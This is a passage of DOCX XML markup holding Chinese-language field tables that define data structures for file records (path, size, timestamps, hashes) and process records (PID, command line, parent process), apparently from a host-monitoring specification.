        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD0B4A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="411D7B6B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B7BD785" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2907ADF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26A96307" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B48C0E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22ED0C20" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23148A5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="660D1176" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E63C97D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75359048" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="637EFB31" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF6E5BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CD873C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46DD82C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AEE4FFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="315CEC2F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19776AAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="154473EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E1FEEFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A2039FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7AAF7245" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54DDA209" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>changeTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="559E20BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E5ADAF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8EE336" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13DDD102" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37BFB162" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modifyTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5004E13B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66416C19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76DCE8D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="468F3C61" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA7FD16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accessTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AA51A26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE8DF86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D3E899" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EE43B8E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000C2664" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D2972F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A2B4C42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A197D2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="751DE68E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74CD9B5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECE2464" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1556CF7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E62F355" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03082F50" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1722DE42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FB54971" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58CF481E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="230E9F76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C0BC170" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>进程信息数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2143"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2185"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="064680E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A08DA6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B0785D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D066FC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AFB505B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="668F7CFA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59CC39EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AD6CCF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D818BA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DD7456F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42300919" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29BA71DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70AF0C77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="067E21A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FDCBC49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程对应执行文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="741FF5BC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47D9CFFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A0CD077" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28A61782" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06E0AB80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程PID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17B5407D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09231BE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F1D791" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E79212" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78DB7F72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="310AD875" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F77A97E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cmdline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CAE1573" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D79ABFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FC76F6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命令行参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E94FF49" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="081EBFE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentProcessName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EB4814C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DD0F091" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23A9A7BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="40863DD3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7512767F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentPid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6058E450" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D3BCCC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A2B7723" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程PID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0206367E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78FEA5C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>parentPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C2A0913" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53AAF2A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="602B8E7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="14B12FA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43653486" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentUserName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C9CCDBA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="468D2945" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30750798" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程所属用户</w:t>
            </w:r>
